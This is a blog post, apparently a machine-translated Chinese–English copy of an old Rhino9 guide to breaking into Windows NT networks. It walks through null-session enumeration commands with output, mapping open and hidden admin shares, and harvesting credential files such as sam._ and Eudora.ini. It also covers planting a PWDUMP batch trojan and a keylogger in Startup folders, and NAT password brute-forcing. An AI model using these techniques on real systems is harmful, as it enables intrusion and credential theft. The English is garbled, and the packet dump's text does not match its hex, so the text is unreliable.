C:\>net use \\0.0.0.0\ipc$ "" /user:"" C: \> net use \ \ 0.0.0.0 \ ipc $ "" / user: ""
The command completed successfully. The command completed successfully.
C:\>net view \\0.0.0.0 C: \> net view \ \ 0.0.0.0
Shared resources at \\0.0.0.0 Shared resources at \ \ 0.0.0.0
Share name Type Used as Comment Share name Type Used as Comment
---------------------------------------------------------------------- -------------------------------------------------- --------------------
--------- ---------
Accelerator Disk Agent Accelerator share for Seagate backup Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk Inetpub Disk
mirc Disk mirc Disk
NETLOGON Disk Logon server share NETLOGON Disk Logon server share
www_pages Disk www_pages Disk
The command completed successfully. The command completed successfully.
正如您所看到的,该服务器上的共享列表在建立了空IPC会话后才可用。 As you can see, the list of shares on the server in the establishment of the IPC null session to be available. 这时,您就会意识到这个IPC连接有多么的危险,但我们现在已经掌握的IPC方法实际上是很基本的方法。 At this time, you will realize how this risk IPC connection, but now we have mastered the IPC method is actually a very basic way. 与IPC共享一起出现的可能性还有待进一步研究。 Appear together with the possibility of shared IPC remains to be further studied. WindowsNT 4.0资源工具的发布使得象管理员和网络入侵者这样的人能够用到新的工具。 WindowsNT 4.0 Resource Kit release allows administrators and network intruders such as people who can use the new tools. 下面对一些资源工具实用程序进行描述。 The following resource tool utility of some description. Rhino9小组运用这些实用程序与IPC$空会话一起收集信息。 Rhino9 team to use these utilities together with the IPC $ null session to gather information. 当您阅读这些工具的描述以及它们所提供的信息时,请记住:所采用的空会话不向远程网络提供任何真实的身份证明。 When you read a description of these tools and information they provide, please remember: the use of null session to the remote network does not provide any real identity.
UsrStat: 这个命令行实用程序显示特定域中各个用户的用户名、全名以及最后一次登录的日期和时间。 UsrStat: This command-line utility displays all the domain-specific user name, full name and last login date and time. 下面是根据远程网络通过一个空IPC会话采用这个工具进行的实际剪切和粘贴: The following is a remote network through a null IPC session using this tool for the actual cut and paste:
C:\NTRESKIT>usrstat domain4 C: \ NTRESKIT> usrstat domain4
Users at \\STUDENT4 Users at \ \ STUDENT4
Administrator - - logon: Tue Nov 17 0855 1998 Administrator - - logon: Tue Nov 17 0855 1998
Guest - - logon: Mon Nov 16 124:04 1998 Guest - - logon: Mon Nov 16 124:04 1998
IUSR_STUDENT4 - Internet Guest Account - logon: Mon Nov 16 1596 1998 IUSR_STUDENT4 - Internet Guest Account - logon: Mon Nov 16 1596 1998
IWAM_STUDENT4 - Web Application Manager account - logon: Never IWAM_STUDENT4 - Web Application Manager account - logon: Never
laurel - - logon: Never laurel - - logon: Never
megan - - logon: Never megan - - logon: Never
我们现在来探讨一下整个俘获过程是怎么样发生的,以便于加深读者的理解。 We now explore is how the entire capture process occurs, so that deepen the reader's understanding. 在真正的攻击发生前,把一个映射放到通过#PRE/#DOM标记映射Student4机器及其域活动状态的mhosts文件中(下面详述)。 Before the real attack, put a map into by # PRE / # DOM tag machine and domain mapping Student4 active mhosts file (detailed below). 然后把表目预加载到NetBIOS高速缓存器中,同时建立一个空IPC会话。 Then head to the table pre-loaded into the NetBIOS cache, the same time to establish a null IPC session. 正如您所看到的,这个命令是根据域名发出的。 As you can see, this command is issued under the domain name. 最后,该工具会向主域控制器查询这个。 Finally, the tool will query the primary domain controller.
其它涉及到IPC共享的渗透方法包括打开远程机的注册表以及远程域用户管理器。 The other involves the infiltration methods include IPC share open the remote machine's registry, and remote User Manager for Domains. 空IPC连接使网络入侵者能够对您的注册表进行访问。 IPC null connection to the network intruder can access your registry. 一旦建立了空IPC会话,网络入侵者就能启用其本地注册表编辑器实用程序,并尝试连接网络注册表选项。 Once the null IPC session, an intruder will be able to enable their local Registry Editor utility, and try to Connect Network Registry option. 如果尝试成功,入侵者就会对一定的注册表键具有只读访问权限,甚至是读/写权限。 If the attempt is successful, the intruder will be on certain registry keys with read-only access, or even read / write permissions. 无论如何,就算对注册表只有只读访问权限,从安全角度来讲这也是非常有害的。 In any case, even if only a read-only access to the registry, from a security point of view this is very harmful.
另外,网络入侵者还会利用IPC域用户管理器方法。 In addition, the intruder will use methods of IPC User Manager for Domains. 这个方法鲜为人知。 This method is known. 我们在这里涉及到这个问题是因为它是一个非常有效的入侵方法。 We are here related to this issue because it is a very effective intrusion method. 这个方法涉及到一个空IP C会话和输入LMHOSTS文件的表目。 This method involves an empty IP C session and enter the LMHOSTS file table head. LMHOSTS文件(在一般情况下)是一个保存在基于Wind ows的机器上的本地文件,用于把NetBIOS名字映射到IP地址。 LMHOSTS file (in general) is stored in a machine-based Wind ows on the local file, used to map NetBIOS names to IP addresses. LMHOSTS文件主要用在非WI NS环境中或者不能使用WINS的客户机上,而实际上,网络入侵者可以通过很多种不同的方式来使用这个文件。 LMHOSTS file is mainly used in non-WI NS environment or can not use WINS client, in fact, the intruder can be many different ways to use this file. 我们将在下文中对LMHOSTS文件的不同使用方法进行探讨. We will be in the LMHOSTS file below for the different methods of use.
===========================================================================现在我们对如何在这个方法中使用LMHOSTS文件进行论述。 ================================================== ========================= Now we are in the method of how to use the LMHOSTS file are discussed. 这是一个绝妙的方法,因为它能说明如何把前面介绍的方法与这个方法结合起来使用从而达到网络入侵者的目的。 This is a wonderful way, because it shows how the method described above and the methods used in combination to achieve the purpose of network intruders. 我们先从端口扫描程序开始,假设端口139是开放的,攻击者就会发出一个nbtstat命令。 We start with the beginning port scanner, assuming port 139 is open, the attacker will send a nbtstat command. 然后,他会通过nbtstat结果收集远程机的NetBIOS名字。 He then nbtstat results collected by the remote machine's NetBIOS name.
让我们来看看得出的nbtstat结果,与前面的结果相同: Let's see the nbtstat results, the same result as before:
C:\>nbtstat -A xxxx C: \> nbtstat-A xxxx
NetBIOS Remote Machine Name Table NetBIOS Remote Machine Name Table
Name Type Status Name Type Status
--------------------------------------------- ---------------------------------------------
DATARAT <00> UNIQUE Registered DATARAT <00> UNIQUE Registered
R9LABS <00> GROUP Registered R9LABS <00> GROUP Registered
DATARAT <20> UNIQUE Registered DATARAT <20> UNIQUE Registered
DATARAT <03> UNIQUE Registered DATARAT <03> UNIQUE Registered
GHOST <03> UNIQUE Registered GHOST <03> UNIQUE Registered
DATARAT <01> UNIQUE Registered DATARAT <01> UNIQUE Registered
MAC Address = 00-00-00-00-00-00 MAC Address = 00-00-00-00-00-00
通过检查nbtstat命令的结果,我们可以找到<03>识别符。 By examining the results of the nbtstat command, we can find <03> identifier. 如果有人从本地登录到该机器上,您就会看到两个<03>识别符。 If someone from a local logon to the machine, you will see two <03> identifier. 在一般情况下,第一个<03>识别符是机器的netbios名字,第二个<03>识别符是本地登录用户的名字。 Under normal circumstances, the first <03> identifier is the netbios name of the machine, and the second <03> identifier is locally logged on user name. 这时,网络入侵者就会把这台机器的netbios名字和IP地址映射放到他本地的LMHOSTS文件中,用#PRE和#DOM标签终止表目。 At this time, the intruder will put the netbios machine name and IP address mapping into his local LMHOSTS file with the # PRE and # DOM tag end of Tables. #PRE标签表示应该把表目预加载到netbios高速缓存器中。 # PRE tag that should be pre-loaded into the target table netbios cache in. #DOM标签表示域活动。 # DOM tag that field activities. 这时,网络入侵者就会发出一个nbtstat CR命令,把表目预加载到他的高速缓存器中。 At this time, the intruder would issue a nbtstat CR command, the table head to his pre-loaded in the cache. 从技术角度来讲,这个预加载会使表目看起来好象已经由一些网络功能解析过,并使名字解析起来更加快捷。 From a technical perspective, this pre-load will head looks as if the table has been parsed by a number of network functions, and make name resolution faster, and more.
下一步,网络入侵者会建立一个空IPC会话。 Next, the intruder creates a null IPC session. 一旦成功地建立了空IPC会话,网络入侵者就能启用域用户管理器的本地拷贝,并在用户管理器中利用选择域功能。 Once successfully established a null IPC session, an intruder will be able to enable the domain user's local copy of the Manager and User Manager to use the selection field features. 接着,远程机的域就会出现(或者能够人工输入),因为它已经被预加载到高速缓存器中。 Then, the remote machine's domain will be (or be able to manually input), because it has been pre-loaded into the cache. 如果远程机的安全性没有保障,用户管理器就会显示远程机上所有用户的列表。 If the remote machine does not guarantee the security, User Manager will display on the remote machine list of all users. 如果这是通过一个很缓慢的链接(如28.8K调制解调器)来进行的,那么在一般情况下就不会起作用。 If this is a very slow link (such as 28.8K modems) to carry out, then under normal circumstances would not work. 但如果采用较快的网络连接,就会有成效。 However, if a faster network connection, there will be results. 既然网络入侵者已经收集到有关您的机器的资料,下一步就是真正渗透您的机器。 Since the intruder has gathered information about your machine, the next step is to really penetrate your machine. 我们要探讨的第一个渗透方法是公开文件共享攻击。 We want to explore is the first public document sharing penetration attacks. 网络入侵者会把前面提到的net view命令和net use命令结合起来实现这一攻击。 Aforementioned network intruder will net view command and the net use command to achieve this combination of attacks.
我们采用前面的net view命令对网络入侵者的攻击进行论述: We use the net view command in front of intruders on the network are discussed:
C:\> net view \\0.0.0.0 C: \> net view \ \ 0.0.0.0
Share name Type Used as Comment Share name Type Used as Comment
---------------------------------------------------------------------- -------------------------------------------------- --------------------
--------- ---------
Accelerator Disk Agent Accelerator share for Seagate backup Accelerator Disk Agent Accelerator share for Seagate backup
Inetpub Disk Inetpub Disk
mirc Disk mirc Disk
NETLOGON Disk Logon server share NETLOGON Disk Logon server share
www_pages Disk www_pages Disk
The command completed successfully. The command completed successfully.
一旦攻击者掌握了远程共享列表,他就会试着映射到远程共享。 Once the attacker remote control of the shared list, he will try to map to a remote share. 这一攻击的命令结构是: The attack command structure is:
c:\>net use x: \\0.0.0.0\inetpub c: \> net use x: \ \ 0.0.0.0 \ inetpub
只有当共享不设密码或分配给everyone群组时这一攻击才有效(注:everyone群组表示每个人。如果有人作为空用户连接,他们现在就是everyone群组的组成部分)。 Only when the password is not shared or distributed to everyone in this attack to be effective when the group (Note: everyone group that each person, if someone as a null user connection, they are now part of a group that is everyone). 如果这些参数都正确,攻击者就能把网络驱动器映射到您的机器上并开始一系列的渗透攻击。 If these parameters are correct, the attacker will be able to map a network drive to your machine and start a series of penetration attacks. 请记住:网络入侵者并不局限于把驱动器映射到通过net view命令显示出来的共享上。 Remember: the intruder is not limited to network drive mapped to the display through the net view command on a share. 了解NT的网络入侵者都知道NT隐藏了管理共享。 About NT NT network intruders know hidden administrative shares. 根据默认值,NT为该机器上的每一个驱动器都创建IPC$共享和一个隐藏共享(即:一台有C、D和E驱动器的机器会有对应的C$、D$和E$ 的隐藏共享)。 According to the default value, NT on the machine are each drive and create a hidden share IPC $ share (ie: one with C, D and E drives the machine will be the corresponding C $, D $ and E $ of hidden share). 另外,还有一个直接映射到NT安装路径的隐藏ADMIN$共享(即:如果您把NT安装在:\winnt目录下,ADMIN$就映射到该驱动器的确切位置)。 In addition, there is a direct mapping to the NT installation path of the hidden ADMIN $ share (ie: if you install the NT: \ winnt directory, ADMIN $ is mapped to the exact location of the drive). Rhino9小组已经注意到,大多数NT安全界人士似乎都不大重视这个从一台内部NT机渗透另一台内部NT机的概念。 Rhino9 team have noticed that most of the NT security professionals do not seem a big emphasis on the internal NT machine from another internal NT machine penetration concept. 在我们的专业检查过程中,Rhino9小组已经多次完成了这项任务。 In our professional inspection process, Rhino9 team has completed this task many times. 问题是,如果网络入侵者是有心的并能得到对您的一台机器的访问权限,他就会悄悄地潜入其余的网络机器。 The problem is, if the intruder is determined and can get your access to a machine, he would quietly sneak into the rest of the network machines. 因此,这些共享攻击会造成严重的威胁。 Therefore, these share attacks pose a serious threat. (旁注:Rhino9小组曾经对位于佛罗里达州的一家大型ISP进行远程渗透检查。我们先得到其技术人员个人机器上的共享访问权限,然后从那里得到整个网络的访问权限。这是完全可以办到的。) (Side note: Rhino9 group was located in Florida, a large ISP for remote penetrant inspection, we get the first machine of its technical staff on sharing personal access, and then from there to get access to the entire network, which can be done completely of.)
首先,有些人可能不会意识到有人在访问您的硬盘时对您的机器所造成的危险。 First, some people may not realize that someone is accessing your hard drive on your machine when the dangers posed. 访问硬盘为收集信息和安放特洛伊木马/病毒提供了新的途径。 Access the hard drive to collect information and arrange for the Trojan / virus provides a new way. 一般情况下,攻击者会寻找包含有口令或高度敏感的数据的内容,因为他能利用这些数据来继续深入您的网络。 Under normal circumstances, an attacker will find a password or contain highly sensitive data, because he can continue to use these data to further your network. 下面列出的是网络入侵者要寻找和利用的一些文件。 Listed below is a network intruder to find and use some of the documents. 我们对每一个文件及其使用方法都进行了简要的介绍。 We each have to use a file and a brief introduction.
Eudora.ini: 这个文件用来存储支持eudora电子邮件软件的配置信息。 Eudora.ini: This file is used to store the support eudora email software configuration information. 被称为udpass.com的工具会提取个人用户名、口令信息以及网络入侵者需要用来窃取用户邮件的所有信息。 The tool is called udpass.com extract personal user name, password information, and network intruder to steal e-mail all the information. 这时,入侵者可以通过配置自己的电子邮件软件来阅读目标邮件。 At this time, the intruder can configure their email software to read the target message. 同样,有些人要花很长时间才能意识到这一危险的存在。 Similarly, some people take a long time to realize that this danger exists. 但是,要记住,在一般情况下,人都会很容易地养成习惯的。 However, keep in mind that under normal circumstances, people will be very easy to develop habits. 用户的电子邮件口令与他们用来登录到网络的口令在大多数情况下都是相同的。 The user's e-mail password to log into the network with their password in most cases are the same. 现在攻击者要做的就是不断地窥探用户的硬驱,寻找能为他指出该用户业务场所的用户简历或一些与工作相关的其它文档,从而使他能够对网络发动强大的攻势。 Now the attacker to do is continue to spy on the user's hard drive, looking for his place of business of the user that the user resume or some other work-related documents, so that he can launch a powerful attack on the network.
Tree.dat: 这是一个由通用软件CuteFTP用来存储用户ftp站点/用户名/口令的文件。 Tree.dat: This is a general-purpose software CuteFTP ftp site for storing user / username / password file. 利用一个称为FireFTP的程序,攻击者就能轻易地破解tree.dat文件。 Use a program called FireFTP, an attacker can easily break tree.dat file. 这样,如上所述,他能不断地收集有关您的信息并对您的业务场所发起攻击。 Thus, as mentioned above, he can continue to collect information about you and your business location to attack. 显而易见,如果您在tree.dat中有一个直接到您业务场所的ftp映射,那么他就能更容易地攻击您的网络。 Obviously, if you have a tree.dat your business directly to the ftp site map, then he can make it easier to attack your network.
PWL: PWL一般内置在Win95机上。 PWL: PWL generally built on the Win95 machine. 它们用来为Windows95最终用户存储操作特有的口令。 They used to Windows95 operating-specific end-user password storage. 一个称为glide.exe的工具会破坏PWL文件。 A tool called glide.exe destroy PWL files. 另外还有一些介绍如何用计算器人工破坏这些PWL文件加密的文档。 There are also manual describes how to use the calculator PWL file encryption destroy these documents. 接下来,攻击者会继续收集有关用户的信息并拟订攻击方案。 Next, the attacker will continue to collect information about users and to develop attack scenarios.
PWD: PWD文件在运行FrontPage或Personal Webserver的机器上。 PWD: PWD files in FrontPage or Personal Webserver is running on the machine. 这些文件包括纯文本用户名和一个与用来管理Web站点的身份证明资料相匹配的加密口令。 These documents include the plain text user name and a Web site and used to manage identity information that matches the encrypted password. 用于这些口令的加密方案是标准的DES方案。 Password for these is the standard DES encryption scheme program. 众所周知,在internet上提供有很多破坏实用程序的DES。 As we all know, the internet provides a lot of damage on the utility of the DES.
Solar Designer编写的John the Ripper能非常有效的破坏这些口令。 Solar Designer's John the Ripper can write very effective destruction of these passwords.
WS_FTP.ini: 这个ini文件在使用ws_ftp软件的机器上。 WS_FTP.ini: The ini file using ws_ftp software on the machine. 尽管适用于这个文件的自动口令析取字最近才被推荐给安全界,但所采用的加密机制还不够强壮。 While for the password file automatically extract word recently been recommended to the Security sector, but the encryption mechanism is not strong. 口令是被转换成十六进制数(2位)的。 Password is converted to hexadecimal (2) of the. 如果一个数字在N位置,那么N就被增加到该数字上。 If a number in the N position, then N is added to the figures. 反向操作就会破坏这个加密方案。 Reverse operation will destroy the encryption scheme. (这种方法有时也可破坏PMail.iniCPegasus Mail和Prefs.jsCNetscape。) (This method can sometimes damage PMail.iniCPegasus Mail and Prefs.jsCNetscape.)
IDC文件:IDC(internet数据库连接符)文件一般用于从web服务器到数据库的后端连接。 IDC file: IDC (internet database connector) files are generally used from the web server to the database back-end connection. 因为这种类型的连接一般都需要身份认证,所以,一些IDC文件包含有纯文本的用户名/口令。 Because this type of connection generally requires authentication, so some IDC files contain plain text username / password. waruser.dat: 这是适用于通用Win32 FTP服务器--WarFTP的配置文件。 waruser.dat: This is for general Win32 FTP server - WarFTP configuration file. 这个特殊的dat文件可包含FTP服务器本身的管理口令。 This special dat file can contain its own FTP server administrative password. 根据作者掌握的资料,这种情况仅在WarFTP 1.70版中发生。 According to the author information available, this situation only occurs in WarFTP 1.70 version.
$winnt$.inf:在WindowsNT的独立安装过程中,安装进程需要信息文件。 $ Winnt $. Inf: in WindowsNT stand-alone installation, the installation process requires information file. 作为这个独立安装进程的残余数据,有一个称为$winnt$.inf的文件位于%systemroot%\system32 目录下。 Installation process as the remnants of this independent data, have called $ winnt $. Inf file is located in% systemroot% \ system32 directory. 这个文件可包含有在安装过程中要使用的帐户的用户名/口令。 This file may contain the installation process to use the account username / password.因为在这些类型的安装中所使用的帐户一般都需要网络上的允许权限设置,所以这是一件很重要的事。
Sam._:尽管人们很早就知道如果SAM数据库被心怀叵测的人所利用就会出现问题,但很多人都不记得这个sam._文件了。如果入侵者能够通过网络安装驱动器,那该如何拷贝SAM数据库呢?一般情况下这是不大可能的,因为您所连接的NT服务器正在运行。当NT服务器正在运行时,它会锁定SAM。不过,如果管理员已经创建了一个紧急修复盘,SAM的拷贝就应该位于systemroot%\repair\目录下。这个文件将命名为sam._。根据默认值,这个拷贝是人人都可读取的。通过利用samdump实用程序的拷贝,您就能从复制的SAM中转储用户名/口令。 ExchVerify.log:这个ExchVerify.log文件是由Cheyenne/Innoculan/ArcServe生成的。一般情况下,它是通过安装Cheyenne/Innoculan/ArcServe软件生成的,内置在进行软件安装的驱动器的根目录下。这个文件可包含有极其敏感的信息,如下所示:
: ExchAuthenticate() called with
NTServerName:[SAMPLESERVER]
NTDomainName[SAMPLESERVER] adminMailbox:[administrator]
adminLoginName:[administrator]
password:[PASSWORD]
很明显,这个文件包含有入侵者用来进一步破坏您的网络完整性的信息。
Profile.tfm:Profile.tfm是一个由POP3客户机软件AcornMail生成的文件。在撰写本文时,AcornMail开始引起 internet界的广泛关注。在检测该软件时,我们发现它是一个很有效的POP3客户机,但其安装并不很好地兼容NTFS。在安装完该软件后,我们开始检查AcornMail生成的文件,发现Profile.tfm文件保存有用户名/口令。一开始,我们断定该软件完全正常,因为它确实以加密的形式存储口令。接着,我们意识到profile.tfm的允许权限被设置为Everyone/完全控制。这样就有了问题,因为任何人都能得到该文件的一个拷贝并把这个文件插入他们自己的AcornMail安装程序中。然后,入侵者就能
用已存储的信息来登录。下面是网络监测器中的俘获信息:
00000000 00 01 70 4C 67 80 98 ED A1 00 01 01 08 00 45 00 ..pLg........
.E.
00000010 00 4A EA A7 40 00 3D 06 14 88 CF 62 C0 53 D1 36 .J..@.=....b.
S.6
00000020 DD 91 00 6E 04 44 F6 1E 84 D6 00 32 51 EB 50 18 ...nD....2Q
.P.
00000030 22 38 64 9E 00 00 2B 4F 4B 20 50 61 73 73 77 6F "8d...+OK.Pas
swo
00000040 72 64 20 72 65 71 75 69 72 65 64 20 66 6F 72 20 rd.required.f
or. or.
00000050 68 6B 69 72 6B 2E 0D 0A jjohn...
00000000 98 ED A1 00 01 01 00 01 70 4C 67 80 08 00 45 00 ........pLg..
.E.
00000010 00 36 A4 02 40 00 80 06 18 41 D1 36 DD 91 CF 62 .6..@....A.6.
..b
00000020 C0 53 04 44 00 6E 00 32 51 EB F6 1E 84 F8 50 18 .SDn2Q....
.P.
00000030 21 AC 99 90 00 00 50 41 53 53 20 67 68 6F 73 74 !.....PASS.xe
rox
00000040 37 33 0D 0A 63..
如您所看到的,用户名/口令确实是用纯文本传送的。这不是AcornMail的错,但是在POPvX中已经有问题出现。这个“数据”文件对换/包取样的方法已经由Rhino9小组在大量的软件上测试过,因此,这一攻击并不局限于AcornMail。
我们已经对入侵者想要得到的文件(如果获得对您的硬驱的访问权限)进行了探讨,现在我们就来讨论一下安放特洛伊木马。如果有一种方法能使攻击者获得大量的信息,那就是安放特洛伊木马。公开的文件共享攻击一般都会为安放特洛伊木马提供方便。在最容易安放和最广为人知的特洛伊木马中,有一个是捆绑在批处理文件中的PWDUMP实用程序。如果准备妥当,这个批处理文件就会最小化执行(也被称为聪明的文件,如viruscan.cmd),然后再运行PWDUMP实用程序,在运行了它的进程后删除PWDUMP实用程序,并最终删去文件本身。它一般都不会留下证据,并会在该台机器上生成一个完美的所有用户名/口令
的文本文件。
“游戏”规则:目标必须是NT主机,执行特洛伊木马程序的最终用户必须是管理员,这样,攻击者就能把批处理文件放在管理员启动文件夹中,开始等待。当下一次管理员登录到机器上时,批处理文件就执行和转储用户名/口令。然后,攻击者就会通过文件共享连接到该机器上并收集结果。入侵者可能尝试的另一个可靠的攻击方法是把按键记录器批处理文件放到启动文件夹中。这种方法可适用于任何用户,不仅仅是管理员。这样即可收集所有该用户发出的按键信息,但没有最初的登录身份资料(这是NT的结构所致,它会在登录过程中终止所有用户方式进程)。然后,攻击者就可以连接到目标机上并收集记录下的按键信息。最致命的特洛伊木马攻击之一就是一个以管理员的身份运行并采用AT命令建立预定事件的批处理文件。因为AT命令能作为系统运行,所以,它能生成SAM数据库和注册表的拷贝。可以想象得出攻击者采用这种方法时会享受到多么大的乐趣。如何防止此类攻击呢?不要把文件共享给Everyone群组,并在您的环境中加强口令机制。如果入侵者遇到一台每次都要向他提示输入身份证明信息的服务器,入侵者就会变得灰心丧气,随即离开。不过,有耐心的入侵者会继续进行Brute Force攻击。无庸置疑,Brute Force NetBIOS攻击最常用的工具是NAT。 NAT(NetBIOS检查工具)工具让用户能够通过可能的用户名/口令列表使网络连接命令自动操作。 NAT将通过所提供的列表中的每一个用户名和每一个口令试着连接到远程机上。这是一个很漫长的过程,但攻击者往往会使用一个常见口令的缩短列表。一个成功的入侵者会通过上述信息收集方法建立他自己的用户名列表。入侵者准备使用的口令列表也是通过收集到的信息建立的。他们通常从不充实的口令列表开始,然后根据用户名建立其余的口令列表。这对于那些能找到给用户名设置的口令的安全专业人士来说完全是意料之中的事。攻击者可以指定一个要攻击的IP地址,也可以指定整个范围内的IP地址。 NAT会尽力完成这项任务,并一直生成格式化报告。
Tidak ada komentar:
Posting Komentar